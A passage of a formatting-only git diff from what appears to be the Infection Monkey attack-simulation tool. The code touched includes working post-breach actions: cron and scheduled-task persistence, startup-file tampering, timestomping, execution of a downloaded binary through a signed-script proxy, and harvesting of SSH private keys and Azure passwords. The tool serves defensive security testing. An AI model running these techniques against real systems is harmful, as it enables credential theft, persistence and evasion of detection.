+ "> {0} ;" f"rm {TEMP_HIST_FILE} -f", # ...original contents # remove temp history file ] @@ -29,13 +28,13 @@ def get_linux_command_history_files(): # get list of paths of different shell history files (default values) with place for username STARTUP_FILES = [ - file_path.format(HOME_DIR) for file_path in - [ - "{0}{{0}}/.bash_history", # bash - "{0}{{0}}/.local/share/fish/fish_history", # fish - "{0}{{0}}/.zsh_history", # zsh - "{0}{{0}}/.sh_history", # ksh - "{0}{{0}}/.history" # csh, tcsh + file_path.format(HOME_DIR) + for file_path in [ + "{0}{{0}}/.bash_history", # bash + "{0}{{0}}/.local/share/fish/fish_history", # fish + "{0}{{0}}/.zsh_history", # zsh + "{0}{{0}}/.sh_history", # ksh + "{0}{{0}}/.history", # csh, tcsh ] ] @@ -47,9 +46,12 @@ def get_linux_usernames(): return [] # get list of usernames - USERS = subprocess.check_output( # noqa: DUO116 - "cut -d: -f1,3 /etc/passwd | egrep ':[0-9]{4}$' | cut -d: -f1", - shell=True - ).decode().split('\n')[:-1] + USERS = ( + subprocess.check_output( # noqa: DUO116 + "cut -d: -f1,3 /etc/passwd | egrep ':[0-9]{4}$' | cut -d: -f1", shell=True + ) + .decode() + .split("\n")[:-1] + ) return USERS diff --git a/monkey/infection_monkey/post_breach/job_scheduling/job_scheduling.py b/monkey/infection_monkey/post_breach/job_scheduling/job_scheduling.py index f7bceef72..a38aa815b 100644 --- a/monkey/infection_monkey/post_breach/job_scheduling/job_scheduling.py +++ b/monkey/infection_monkey/post_breach/job_scheduling/job_scheduling.py @@ -1,8 +1,12 @@ import subprocess -from infection_monkey.post_breach.job_scheduling.linux_job_scheduling import get_linux_commands_to_schedule_jobs +from infection_monkey.post_breach.job_scheduling.linux_job_scheduling import ( + get_linux_commands_to_schedule_jobs, +) from infection_monkey.post_breach.job_scheduling.windows_job_scheduling import ( - get_windows_commands_to_remove_scheduled_jobs, get_windows_commands_to_schedule_jobs) + get_windows_commands_to_remove_scheduled_jobs, + get_windows_commands_to_schedule_jobs, +) from infection_monkey.utils.environment import is_windows_os diff --git a/monkey/infection_monkey/post_breach/job_scheduling/linux_job_scheduling.py b/monkey/infection_monkey/post_breach/job_scheduling/linux_job_scheduling.py index 4ed5ff970..09a8075e0 100644 --- a/monkey/infection_monkey/post_breach/job_scheduling/linux_job_scheduling.py +++ b/monkey/infection_monkey/post_breach/job_scheduling/linux_job_scheduling.py @@ -3,10 +3,10 @@ TEMP_CRON = "$HOME/monkey-schedule-jobs" def get_linux_commands_to_schedule_jobs(): return [ - f'touch {TEMP_CRON} &&', - f'crontab -l > {TEMP_CRON} &&', - 'echo \"# Successfully scheduled a job using crontab\" |', - f'tee -a {TEMP_CRON} &&', - f'crontab {TEMP_CRON} ;', - f'rm {TEMP_CRON}' + f"touch {TEMP_CRON} &&", + f"crontab -l > {TEMP_CRON} &&", + 'echo "# Successfully scheduled a job using crontab" |', + f"tee -a {TEMP_CRON} &&", + f"crontab {TEMP_CRON} ;", + f"rm {TEMP_CRON}", ] diff --git a/monkey/infection_monkey/post_breach/job_scheduling/windows_job_scheduling.py b/monkey/infection_monkey/post_breach/job_scheduling/windows_job_scheduling.py index 6fd888d67..4c4927419 100644 --- a/monkey/infection_monkey/post_breach/job_scheduling/windows_job_scheduling.py +++ b/monkey/infection_monkey/post_breach/job_scheduling/windows_job_scheduling.py @@ -1,12 +1,12 @@ -SCHEDULED_TASK_NAME = 'monkey-spawn-cmd' -SCHEDULED_TASK_COMMAND = r'C:\windows\system32\cmd.exe' +SCHEDULED_TASK_NAME = "monkey-spawn-cmd" +SCHEDULED_TASK_COMMAND = r"C:\windows\system32\cmd.exe" # 
Commands from: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md def get_windows_commands_to_schedule_jobs(): - return f'schtasks /Create /SC monthly /F /TN {SCHEDULED_TASK_NAME} /TR {SCHEDULED_TASK_COMMAND}' + return f"schtasks /Create /SC monthly /F /TN {SCHEDULED_TASK_NAME} /TR {SCHEDULED_TASK_COMMAND}" def get_windows_commands_to_remove_scheduled_jobs(): - return f'schtasks /Delete /TN {SCHEDULED_TASK_NAME} /F > nul 2>&1' + return f"schtasks /Delete /TN {SCHEDULED_TASK_NAME} /F > nul 2>&1" diff --git a/monkey/infection_monkey/post_breach/pba.py b/monkey/infection_monkey/post_breach/pba.py index 93d10d45e..e9bf61935 100644 --- a/monkey/infection_monkey/post_breach/pba.py +++ b/monkey/infection_monkey/post_breach/pba.py @@ -11,7 +11,7 @@ from infection_monkey.utils.plugins.plugin import Plugin LOG = logging.getLogger(__name__) -__author__ = 'VakarisZ' +__author__ = "VakarisZ" class PBA(Plugin): @@ -60,7 +60,9 @@ class PBA(Plugin): exec_funct = self._execute_default result = exec_funct() if self.scripts_were_used_successfully(result): - T1064Telem(ScanStatus.USED, f"Scripts were used to execute {self.name} post breach action.").send() + T1064Telem( + ScanStatus.USED, f"Scripts were used to execute {self.name} post breach action." + ).send() PostBreachTelem(self, result).send() else: LOG.debug(f"No command available for PBA '{self.name}' on current OS, skipping.") @@ -87,7 +89,9 @@ class PBA(Plugin): :return: Tuple of command's output string and boolean, indicating if it succeeded """ try: - output = subprocess.check_output(self.command, stderr=subprocess.STDOUT, shell=True).decode() + output = subprocess.check_output( + self.command, stderr=subprocess.STDOUT, shell=True + ).decode() return output, True except subprocess.CalledProcessError as e: # Return error output of the command diff --git a/monkey/infection_monkey/post_breach/post_breach_handler.py b/monkey/infection_monkey/post_breach/post_breach_handler.py index 888984551..315cdac0b 100644 --- a/monkey/infection_monkey/post_breach/post_breach_handler.py +++ b/monkey/infection_monkey/post_breach/post_breach_handler.py @@ -7,7 +7,7 @@ from infection_monkey.utils.environment import is_windows_os LOG = logging.getLogger(__name__) -__author__ = 'VakarisZ' +__author__ = "VakarisZ" PATH_TO_ACTIONS = "infection_monkey.post_breach.actions." 
diff --git a/monkey/infection_monkey/post_breach/setuid_setgid/linux_setuid_setgid.py b/monkey/infection_monkey/post_breach/setuid_setgid/linux_setuid_setgid.py index b1f40b5b7..5a4a7f1dc 100644 --- a/monkey/infection_monkey/post_breach/setuid_setgid/linux_setuid_setgid.py +++ b/monkey/infection_monkey/post_breach/setuid_setgid/linux_setuid_setgid.py @@ -1,11 +1,11 @@ -TEMP_FILE = '$HOME/monkey-temp-file' +TEMP_FILE = "$HOME/monkey-temp-file" # Commands from https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md def get_linux_commands_to_setuid_setgid(): return [ - f'touch {TEMP_FILE} && chown root {TEMP_FILE} && chmod u+s {TEMP_FILE} && chmod g+s {TEMP_FILE} &&', + f"touch {TEMP_FILE} && chown root {TEMP_FILE} && chmod u+s {TEMP_FILE} && chmod g+s {TEMP_FILE} &&", 'echo "Successfully changed setuid/setgid bits" &&', - f'rm {TEMP_FILE}' + f"rm {TEMP_FILE}", ] diff --git a/monkey/infection_monkey/post_breach/setuid_setgid/setuid_setgid.py b/monkey/infection_monkey/post_breach/setuid_setgid/setuid_setgid.py index 7760ab900..8997e143c 100644 --- a/monkey/infection_monkey/post_breach/setuid_setgid/setuid_setgid.py +++ b/monkey/infection_monkey/post_breach/setuid_setgid/setuid_setgid.py @@ -1,4 +1,6 @@ -from infection_monkey.post_breach.setuid_setgid.linux_setuid_setgid import get_linux_commands_to_setuid_setgid +from infection_monkey.post_breach.setuid_setgid.linux_setuid_setgid import ( + get_linux_commands_to_setuid_setgid, +) def get_commands_to_change_setuid_setgid(): diff --git a/monkey/infection_monkey/post_breach/shell_startup_files/linux/shell_startup_files_modification.py b/monkey/infection_monkey/post_breach/shell_startup_files/linux/shell_startup_files_modification.py index 60e47d50c..ddd8f514b 100644 --- a/monkey/infection_monkey/post_breach/shell_startup_files/linux/shell_startup_files_modification.py +++ b/monkey/infection_monkey/post_breach/shell_startup_files/linux/shell_startup_files_modification.py @@ -5,36 +5,43 @@ from infection_monkey.utils.environment import is_windows_os def get_linux_commands_to_modify_shell_startup_files(): if is_windows_os(): - return '', [], [] + return "", [], [] HOME_DIR = "/home/" # get list of usernames - USERS = subprocess.check_output( # noqa: DUO116 - "cut -d: -f1,3 /etc/passwd | egrep ':[0-9]{4}$' | cut -d: -f1", - shell=True - ).decode().split('\n')[:-1] + USERS = ( + subprocess.check_output( # noqa: DUO116 + "cut -d: -f1,3 /etc/passwd | egrep ':[0-9]{4}$' | cut -d: -f1", shell=True + ) + .decode() + .split("\n")[:-1] + ) # get list of paths of different shell startup files with place for username STARTUP_FILES = [ - file_path.format(HOME_DIR) for file_path in - [ - "{0}{{0}}/.profile", # bash, dash, ksh, sh - "{0}{{0}}/.bashrc", # bash + file_path.format(HOME_DIR) + for file_path in [ + "{0}{{0}}/.profile", # bash, dash, ksh, sh + "{0}{{0}}/.bashrc", # bash "{0}{{0}}/.bash_profile", - "{0}{{0}}/.config/fish/config.fish", # fish - "{0}{{0}}/.zshrc", # zsh + "{0}{{0}}/.config/fish/config.fish", # fish + "{0}{{0}}/.zshrc", # zsh "{0}{{0}}/.zshenv", "{0}{{0}}/.zprofile", - "{0}{{0}}/.kshrc", # ksh - "{0}{{0}}/.tcshrc", # tcsh - "{0}{{0}}/.cshrc", # csh + "{0}{{0}}/.kshrc", # ksh + "{0}{{0}}/.tcshrc", # tcsh + "{0}{{0}}/.cshrc", # csh ] ] - return [ - '3<{0} 3<&- &&', # check for existence of file - 'echo \"# Succesfully modified {0}\" |', - 'tee -a {0} &&', # append to file - 'sed -i \'$d\' {0}', # remove last line of file (undo changes) - ], STARTUP_FILES, USERS + return ( + [ + "3<{0} 3<&- &&", # check for 
existence of file + 'echo "# Succesfully modified {0}" |', + "tee -a {0} &&", # append to file + "sed -i '$d' {0}", # remove last line of file (undo changes) + ], + STARTUP_FILES, + USERS, + ) diff --git a/monkey/infection_monkey/post_breach/shell_startup_files/shell_startup_files_modification.py b/monkey/infection_monkey/post_breach/shell_startup_files/shell_startup_files_modification.py index 65774c2ad..0be9ec369 100644 --- a/monkey/infection_monkey/post_breach/shell_startup_files/shell_startup_files_modification.py +++ b/monkey/infection_monkey/post_breach/shell_startup_files/shell_startup_files_modification.py @@ -1,7 +1,9 @@ -from infection_monkey.post_breach.shell_startup_files.linux.shell_startup_files_modification import \ - get_linux_commands_to_modify_shell_startup_files -from infection_monkey.post_breach.shell_startup_files.windows.shell_startup_files_modification import \ - get_windows_commands_to_modify_shell_startup_files +from infection_monkey.post_breach.shell_startup_files.linux.shell_startup_files_modification import ( + get_linux_commands_to_modify_shell_startup_files, +) +from infection_monkey.post_breach.shell_startup_files.windows.shell_startup_files_modification import ( + get_windows_commands_to_modify_shell_startup_files, +) def get_commands_to_modify_shell_startup_files(): diff --git a/monkey/infection_monkey/post_breach/shell_startup_files/windows/shell_startup_files_modification.py b/monkey/infection_monkey/post_breach/shell_startup_files/windows/shell_startup_files_modification.py index a4d32938e..517692276 100644 --- a/monkey/infection_monkey/post_breach/shell_startup_files/windows/shell_startup_files_modification.py +++ b/monkey/infection_monkey/post_breach/shell_startup_files/windows/shell_startup_files_modification.py @@ -5,23 +5,27 @@ from infection_monkey.utils.environment import is_windows_os def get_windows_commands_to_modify_shell_startup_files(): if not is_windows_os(): - return '', [] + return "", [] # get powershell startup file path - SHELL_STARTUP_FILE = subprocess.check_output('powershell $Profile').decode().split("\r\n")[0] + SHELL_STARTUP_FILE = subprocess.check_output("powershell $Profile").decode().split("\r\n")[0] SHELL_STARTUP_FILE_PATH_COMPONENTS = SHELL_STARTUP_FILE.split("\\") # get list of usernames - USERS = subprocess.check_output('dir C:\\Users /b', shell=True).decode().split("\r\n")[:-1] # noqa: DUO116 + USERS = ( + subprocess.check_output("dir C:\\Users /b", shell=True).decode().split("\r\n")[:-1] + ) # noqa: DUO116 USERS.remove("Public") - STARTUP_FILES_PER_USER = ['\\'.join(SHELL_STARTUP_FILE_PATH_COMPONENTS[:2] + - [user] + - SHELL_STARTUP_FILE_PATH_COMPONENTS[3:]) - for user in USERS] + STARTUP_FILES_PER_USER = [ + "\\".join( + SHELL_STARTUP_FILE_PATH_COMPONENTS[:2] + [user] + SHELL_STARTUP_FILE_PATH_COMPONENTS[3:] + ) + for user in USERS + ] return [ - 'powershell.exe', - 'infection_monkey/post_breach/shell_startup_files/windows/modify_powershell_startup_file.ps1', - '-startup_file_path {0}' + "powershell.exe", + "infection_monkey/post_breach/shell_startup_files/windows/modify_powershell_startup_file.ps1", + "-startup_file_path {0}", ], STARTUP_FILES_PER_USER diff --git a/monkey/infection_monkey/post_breach/signed_script_proxy/signed_script_proxy.py b/monkey/infection_monkey/post_breach/signed_script_proxy/signed_script_proxy.py index 5db88cfc4..cfabaafec 100644 --- a/monkey/infection_monkey/post_breach/signed_script_proxy/signed_script_proxy.py +++ 
b/monkey/infection_monkey/post_breach/signed_script_proxy/signed_script_proxy.py @@ -1,8 +1,10 @@ import subprocess from infection_monkey.post_breach.signed_script_proxy.windows.signed_script_proxy import ( - get_windows_commands_to_delete_temp_comspec, get_windows_commands_to_proxy_execution_using_signed_script, - get_windows_commands_to_reset_comspec) + get_windows_commands_to_delete_temp_comspec, + get_windows_commands_to_proxy_execution_using_signed_script, + get_windows_commands_to_reset_comspec, +) from infection_monkey.utils.environment import is_windows_os @@ -13,5 +15,7 @@ def get_commands_to_proxy_execution_using_signed_script(): def cleanup_changes(original_comspec): if is_windows_os(): - subprocess.run(get_windows_commands_to_reset_comspec(original_comspec), shell=True) # noqa: DUO116 + subprocess.run( + get_windows_commands_to_reset_comspec(original_comspec), shell=True + ) # noqa: DUO116 subprocess.run(get_windows_commands_to_delete_temp_comspec(), shell=True) # noqa: DUO116 diff --git a/monkey/infection_monkey/post_breach/signed_script_proxy/windows/signed_script_proxy.py b/monkey/infection_monkey/post_breach/signed_script_proxy/windows/signed_script_proxy.py index 6cdf5fe01..b1918a716 100644 --- a/monkey/infection_monkey/post_breach/signed_script_proxy/windows/signed_script_proxy.py +++ b/monkey/infection_monkey/post_breach/signed_script_proxy/windows/signed_script_proxy.py @@ -2,27 +2,24 @@ import os from infection_monkey.control import ControlClient -TEMP_COMSPEC = os.path.join(os.getcwd(), 'random_executable.exe') +TEMP_COMSPEC = os.path.join(os.getcwd(), "random_executable.exe") def get_windows_commands_to_proxy_execution_using_signed_script(): download = ControlClient.get_T1216_pba_file() - with open(TEMP_COMSPEC, 'wb') as random_exe_obj: + with open(TEMP_COMSPEC, "wb") as random_exe_obj: random_exe_obj.write(download.content) random_exe_obj.flush() - windir_path = os.environ['WINDIR'] - signed_script = os.path.join(windir_path, 'System32', 'manage-bde.wsf') + windir_path = os.environ["WINDIR"] + signed_script = os.path.join(windir_path, "System32", "manage-bde.wsf") - return [ - f'set comspec={TEMP_COMSPEC} &&', - f'cscript {signed_script}' - ] + return [f"set comspec={TEMP_COMSPEC} &&", f"cscript {signed_script}"] def get_windows_commands_to_reset_comspec(original_comspec): - return f'set comspec={original_comspec}' + return f"set comspec={original_comspec}" def get_windows_commands_to_delete_temp_comspec(): - return f'del {TEMP_COMSPEC} /f' + return f"del {TEMP_COMSPEC} /f" diff --git a/monkey/infection_monkey/post_breach/tests/actions/test_users_custom_pba.py b/monkey/infection_monkey/post_breach/tests/actions/test_users_custom_pba.py index 5638e16cc..2956c140f 100644 --- a/monkey/infection_monkey/post_breach/tests/actions/test_users_custom_pba.py +++ b/monkey/infection_monkey/post_breach/tests/actions/test_users_custom_pba.py @@ -34,9 +34,7 @@ def set_os_windows(monkeypatch): @pytest.fixture -def mock_UsersPBA_linux_custom_file_and_cmd( - set_os_linux, fake_monkey_dir_path, monkeypatch -): +def mock_UsersPBA_linux_custom_file_and_cmd(set_os_linux, fake_monkey_dir_path, monkeypatch): monkeypatch.setattr( "infection_monkey.config.WormConfiguration.custom_PBA_linux_cmd", CUSTOM_LINUX_CMD, @@ -56,9 +54,7 @@ def test_command_linux_custom_file_and_cmd( @pytest.fixture -def mock_UsersPBA_windows_custom_file_and_cmd( - set_os_windows, fake_monkey_dir_path, monkeypatch -): +def mock_UsersPBA_windows_custom_file_and_cmd(set_os_windows, fake_monkey_dir_path, monkeypatch): 
monkeypatch.setattr( "infection_monkey.config.WormConfiguration.custom_PBA_windows_cmd", CUSTOM_WINDOWS_CMD, @@ -80,9 +76,7 @@ def test_command_windows_custom_file_and_cmd( @pytest.fixture def mock_UsersPBA_linux_custom_file(set_os_linux, fake_monkey_dir_path, monkeypatch): - monkeypatch.setattr( - "infection_monkey.config.WormConfiguration.custom_PBA_linux_cmd", None - ) + monkeypatch.setattr("infection_monkey.config.WormConfiguration.custom_PBA_linux_cmd", None) monkeypatch.setattr( "infection_monkey.config.WormConfiguration.PBA_linux_filename", CUSTOM_LINUX_FILENAME, @@ -96,13 +90,9 @@ def test_command_linux_custom_file(mock_UsersPBA_linux_custom_file): @pytest.fixture -def mock_UsersPBA_windows_custom_file( - set_os_windows, fake_monkey_dir_path, monkeypatch -): +def mock_UsersPBA_windows_custom_file(set_os_windows, fake_monkey_dir_path, monkeypatch): - monkeypatch.setattr( - "infection_monkey.config.WormConfiguration.custom_PBA_windows_cmd", None - ) + monkeypatch.setattr("infection_monkey.config.WormConfiguration.custom_PBA_windows_cmd", None) monkeypatch.setattr( "infection_monkey.config.WormConfiguration.PBA_windows_filename", CUSTOM_WINDOWS_FILENAME, @@ -122,9 +112,7 @@ def mock_UsersPBA_linux_custom_cmd(set_os_linux, fake_monkey_dir_path, monkeypat "infection_monkey.config.WormConfiguration.custom_PBA_linux_cmd", CUSTOM_LINUX_CMD, ) - monkeypatch.setattr( - "infection_monkey.config.WormConfiguration.PBA_linux_filename", None - ) + monkeypatch.setattr("infection_monkey.config.WormConfiguration.PBA_linux_filename", None) return UsersPBA() @@ -140,9 +128,7 @@ def mock_UsersPBA_windows_custom_cmd(set_os_windows, fake_monkey_dir_path, monke "infection_monkey.config.WormConfiguration.custom_PBA_windows_cmd", CUSTOM_WINDOWS_CMD, ) - monkeypatch.setattr( - "infection_monkey.config.WormConfiguration.PBA_windows_filename", None - ) + monkeypatch.setattr("infection_monkey.config.WormConfiguration.PBA_windows_filename", None) return UsersPBA() diff --git a/monkey/infection_monkey/post_breach/timestomping/linux/timestomping.py b/monkey/infection_monkey/post_breach/timestomping/linux/timestomping.py index ee6c02f58..4860e2d3e 100644 --- a/monkey/infection_monkey/post_breach/timestomping/linux/timestomping.py +++ b/monkey/infection_monkey/post_breach/timestomping/linux/timestomping.py @@ -1,13 +1,13 @@ -TEMP_FILE = 'monkey-timestomping-file.txt' -TIMESTAMP_EPOCH = '197001010000.00' +TEMP_FILE = "monkey-timestomping-file.txt" +TIMESTAMP_EPOCH = "197001010000.00" def get_linux_timestomping_commands(): return [ f'echo "Successfully changed a file\'s modification timestamp" > {TEMP_FILE} && ' - f'touch -m -t {TIMESTAMP_EPOCH} {TEMP_FILE} && ' - f'cat {TEMP_FILE} ; ' - f'rm {TEMP_FILE} -f' + f"touch -m -t {TIMESTAMP_EPOCH} {TEMP_FILE} && " + f"cat {TEMP_FILE} ; " + f"rm {TEMP_FILE} -f" ] diff --git a/monkey/infection_monkey/post_breach/timestomping/timestomping.py b/monkey/infection_monkey/post_breach/timestomping/timestomping.py index 321904c41..5e71d1e50 100644 --- a/monkey/infection_monkey/post_breach/timestomping/timestomping.py +++ b/monkey/infection_monkey/post_breach/timestomping/timestomping.py @@ -1,5 +1,9 @@ -from infection_monkey.post_breach.timestomping.linux.timestomping import get_linux_timestomping_commands -from infection_monkey.post_breach.timestomping.windows.timestomping import get_windows_timestomping_commands +from infection_monkey.post_breach.timestomping.linux.timestomping import ( + get_linux_timestomping_commands, +) +from 
infection_monkey.post_breach.timestomping.windows.timestomping import ( + get_windows_timestomping_commands, +) def get_timestomping_commands(): diff --git a/monkey/infection_monkey/post_breach/timestomping/windows/timestomping.py b/monkey/infection_monkey/post_breach/timestomping/windows/timestomping.py index 9f23193f7..952ae46c6 100644 --- a/monkey/infection_monkey/post_breach/timestomping/windows/timestomping.py +++ b/monkey/infection_monkey/post_breach/timestomping/windows/timestomping.py @@ -1,8 +1,8 @@ -TEMP_FILE = 'monkey-timestomping-file.txt' +TEMP_FILE = "monkey-timestomping-file.txt" def get_windows_timestomping_commands(): - return 'powershell.exe infection_monkey/post_breach/timestomping/windows/timestomping.ps1' + return "powershell.exe infection_monkey/post_breach/timestomping/windows/timestomping.ps1" # Commands' source: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md diff --git a/monkey/infection_monkey/post_breach/trap_command/linux_trap_command.py b/monkey/infection_monkey/post_breach/trap_command/linux_trap_command.py index 8a251e258..0b9c74b04 100644 --- a/monkey/infection_monkey/post_breach/trap_command/linux_trap_command.py +++ b/monkey/infection_monkey/post_breach/trap_command/linux_trap_command.py @@ -1,5 +1,5 @@ def get_linux_trap_commands(): return [ - 'trap \'echo \"Successfully used trap command\"\' INT && kill -2 $$ ;', # trap and send SIGINT signal - 'trap - INT' # untrap SIGINT + "trap 'echo \"Successfully used trap command\"' INT && kill -2 $$ ;", # trap and send SIGINT signal + "trap - INT", # untrap SIGINT ] diff --git a/monkey/infection_monkey/pyinstaller_hooks/hook-infection_monkey.exploit.py b/monkey/infection_monkey/pyinstaller_hooks/hook-infection_monkey.exploit.py index 2bfb21972..245f7574b 100644 --- a/monkey/infection_monkey/pyinstaller_hooks/hook-infection_monkey.exploit.py +++ b/monkey/infection_monkey/pyinstaller_hooks/hook-infection_monkey.exploit.py @@ -1,4 +1,4 @@ from PyInstaller.utils.hooks import collect_data_files, collect_submodules -hiddenimports = collect_submodules('infection_monkey.exploit') -datas = (collect_data_files('infection_monkey.exploit', include_py_files=True)) +hiddenimports = collect_submodules("infection_monkey.exploit") +datas = collect_data_files("infection_monkey.exploit", include_py_files=True) diff --git a/monkey/infection_monkey/pyinstaller_hooks/hook-infection_monkey.network.py b/monkey/infection_monkey/pyinstaller_hooks/hook-infection_monkey.network.py index e80038ebd..07a29b086 100644 --- a/monkey/infection_monkey/pyinstaller_hooks/hook-infection_monkey.network.py +++ b/monkey/infection_monkey/pyinstaller_hooks/hook-infection_monkey.network.py @@ -1,4 +1,4 @@ from PyInstaller.utils.hooks import collect_data_files, collect_submodules -hiddenimports = collect_submodules('infection_monkey.network') -datas = (collect_data_files('infection_monkey.network', include_py_files=True)) +hiddenimports = collect_submodules("infection_monkey.network") +datas = collect_data_files("infection_monkey.network", include_py_files=True) diff --git a/monkey/infection_monkey/pyinstaller_hooks/hook-infection_monkey.post_breach.actions.py b/monkey/infection_monkey/pyinstaller_hooks/hook-infection_monkey.post_breach.actions.py index 55dc7c8c9..9f83c775d 100644 --- a/monkey/infection_monkey/pyinstaller_hooks/hook-infection_monkey.post_breach.actions.py +++ b/monkey/infection_monkey/pyinstaller_hooks/hook-infection_monkey.post_breach.actions.py @@ -1,6 +1,6 @@ from PyInstaller.utils.hooks import 
collect_data_files, collect_submodules # Import all actions as modules -hiddenimports = collect_submodules('infection_monkey.post_breach.actions') +hiddenimports = collect_submodules("infection_monkey.post_breach.actions") # Add action files that we enumerate -datas = (collect_data_files('infection_monkey.post_breach.actions', include_py_files=True)) +datas = collect_data_files("infection_monkey.post_breach.actions", include_py_files=True) diff --git a/monkey/infection_monkey/pyinstaller_hooks/hook-infection_monkey.system_info.collectors.py b/monkey/infection_monkey/pyinstaller_hooks/hook-infection_monkey.system_info.collectors.py index 10fe02a17..22d2740bb 100644 --- a/monkey/infection_monkey/pyinstaller_hooks/hook-infection_monkey.system_info.collectors.py +++ b/monkey/infection_monkey/pyinstaller_hooks/hook-infection_monkey.system_info.collectors.py @@ -1,6 +1,6 @@ from PyInstaller.utils.hooks import collect_data_files, collect_submodules # Import all actions as modules -hiddenimports = collect_submodules('infection_monkey.system_info.collectors') +hiddenimports = collect_submodules("infection_monkey.system_info.collectors") # Add action files that we enumerate -datas = (collect_data_files('infection_monkey.system_info.collectors', include_py_files=True)) +datas = collect_data_files("infection_monkey.system_info.collectors", include_py_files=True) diff --git a/monkey/infection_monkey/pyinstaller_utils.py b/monkey/infection_monkey/pyinstaller_utils.py index 3e2bed17e..2dd8325ce 100644 --- a/monkey/infection_monkey/pyinstaller_utils.py +++ b/monkey/infection_monkey/pyinstaller_utils.py @@ -1,7 +1,7 @@ import os import sys -__author__ = 'itay.mizeretz' +__author__ = "itay.mizeretz" def get_binaries_dir_path(): @@ -9,7 +9,7 @@ def get_binaries_dir_path(): Gets the path to the binaries dir (files packaged in pyinstaller if it was used, infection_monkey dir otherwise) :return: Binaries dir path """ - if getattr(sys, 'frozen', False): + if getattr(sys, "frozen", False): return sys._MEIPASS else: return os.path.dirname(os.path.abspath(__file__)) diff --git a/monkey/infection_monkey/system_info/SSH_info_collector.py b/monkey/infection_monkey/system_info/SSH_info_collector.py index 3977d2444..556b5472c 100644 --- a/monkey/infection_monkey/system_info/SSH_info_collector.py +++ b/monkey/infection_monkey/system_info/SSH_info_collector.py @@ -6,7 +6,7 @@ import pwd from common.utils.attack_utils import ScanStatus from infection_monkey.telemetry.attack.t1005_telem import T1005Telem -__author__ = 'VakarisZ' +__author__ = "VakarisZ" LOG = logging.getLogger(__name__) @@ -16,7 +16,7 @@ class SSHCollector(object): SSH keys and known hosts collection module """ - default_dirs = ['/.ssh/', '/'] + default_dirs = ["/.ssh/", "/"] @staticmethod def get_info(): @@ -37,33 +37,41 @@ class SSHCollector(object): known_hosts: contents of known_hosts file(all the servers keys are good for, possibly hashed) """ - return {'name': name, 'home_dir': home_dir, 'public_key': None, - 'private_key': None, 'known_hosts': None} + return { + "name": name, + "home_dir": home_dir, + "public_key": None, + "private_key": None, + "known_hosts": None, + } @staticmethod def get_home_dirs(): - root_dir = SSHCollector.get_ssh_struct('root', '') - home_dirs = [SSHCollector.get_ssh_struct(x.pw_name, x.pw_dir) for x in pwd.getpwall() - if x.pw_dir.startswith('/home')] + root_dir = SSHCollector.get_ssh_struct("root", "") + home_dirs = [ + SSHCollector.get_ssh_struct(x.pw_name, x.pw_dir) + for x in pwd.getpwall() + if 
x.pw_dir.startswith("/home") + ] home_dirs.append(root_dir) return home_dirs @staticmethod def get_ssh_files(usr_info): for info in usr_info: - path = info['home_dir'] + path = info["home_dir"] for directory in SSHCollector.default_dirs: if os.path.isdir(path + directory): try: current_path = path + directory # Searching for public key - if glob.glob(os.path.join(current_path, '*.pub')): + if glob.glob(os.path.join(current_path, "*.pub")): # Getting first file in current path with .pub extension(public key) - public = (glob.glob(os.path.join(current_path, '*.pub'))[0]) + public = glob.glob(os.path.join(current_path, "*.pub"))[0] LOG.info("Found public key in %s" % public) try: with open(public) as f: - info['public_key'] = f.read() + info["public_key"] = f.read() # By default private key has the same name as public, only without .pub private = os.path.splitext(public)[0] if os.path.exists(private): @@ -71,30 +79,35 @@ class SSHCollector(object): with open(private) as f: # no use from ssh key if it's encrypted private_key = f.read() - if private_key.find('ENCRYPTED') == -1: - info['private_key'] = private_key + if private_key.find("ENCRYPTED") == -1: + info["private_key"] = private_key LOG.info("Found private key in %s" % private) - T1005Telem(ScanStatus.USED, 'SSH key', "Path: %s" % private).send() + T1005Telem( + ScanStatus.USED, "SSH key", "Path: %s" % private + ).send() else: continue except (IOError, OSError): pass # By default known hosts file is called 'known_hosts' - known_hosts = os.path.join(current_path, 'known_hosts') + known_hosts = os.path.join(current_path, "known_hosts") if os.path.exists(known_hosts): try: with open(known_hosts) as f: - info['known_hosts'] = f.read() + info["known_hosts"] = f.read() LOG.info("Found known_hosts in %s" % known_hosts) except (IOError, OSError): pass # If private key found don't search more - if info['private_key']: + if info["private_key"]: break except (IOError, OSError): pass except OSError: pass - usr_info = [info for info in usr_info if info['private_key'] or info['known_hosts'] - or info['public_key']] + usr_info = [ + info + for info in usr_info + if info["private_key"] or info["known_hosts"] or info["public_key"] + ] return usr_info diff --git a/monkey/infection_monkey/system_info/__init__.py b/monkey/infection_monkey/system_info/__init__.py index a5502a2c0..5fc91f371 100644 --- a/monkey/infection_monkey/system_info/__init__.py +++ b/monkey/infection_monkey/system_info/__init__.py @@ -19,7 +19,7 @@ except NameError: # noinspection PyShadowingBuiltins WindowsError = psutil.AccessDenied -__author__ = 'uri' +__author__ = "uri" class OperatingSystem(IntEnum): @@ -36,9 +36,11 @@ class SystemInfoCollector(object): self.os = SystemInfoCollector.get_os() if OperatingSystem.Windows == self.os: from .windows_info_collector import WindowsInfoCollector + self.collector = WindowsInfoCollector() else: from .linux_info_collector import LinuxInfoCollector + self.collector = LinuxInfoCollector() def get_info(self): @@ -76,11 +78,10 @@ class InfoCollector(object): :return: None. 
Updates class information """ LOG.debug("Reading subnets") - self.info['network_info'] = \ - { - 'networks': get_host_subnets(), - 'netstat': NetstatCollector.get_netstat_info() - } + self.info["network_info"] = { + "networks": get_host_subnets(), + "netstat": NetstatCollector.get_netstat_info(), + } def get_azure_info(self): """ @@ -91,11 +92,12 @@ class InfoCollector(object): # noinspection PyBroadException try: from infection_monkey.config import WormConfiguration + if AZURE_CRED_COLLECTOR not in WormConfiguration.system_info_collector_classes: return LOG.debug("Harvesting creds if on an Azure machine") azure_collector = AzureCollector() - if 'credentials' not in self.info: + if "credentials" not in self.info: self.info["credentials"] = {} azure_creds = azure_collector.extract_stored_credentials() for cred in azure_creds: @@ -105,11 +107,11 @@ class InfoCollector(object): self.info["credentials"][username] = {} # we might be losing passwords in case of multiple reset attempts on same username # or in case another collector already filled in a password for this user - self.info["credentials"][username]['password'] = password - self.info["credentials"][username]['username'] = username + self.info["credentials"][username]["password"] = password + self.info["credentials"][username]["username"] = username if len(azure_creds) != 0: self.info["Azure"] = {} - self.info["Azure"]['usernames'] = [cred[0] for cred in azure_creds] + self.info["Azure"]["usernames"] = [cred[0] for cred in 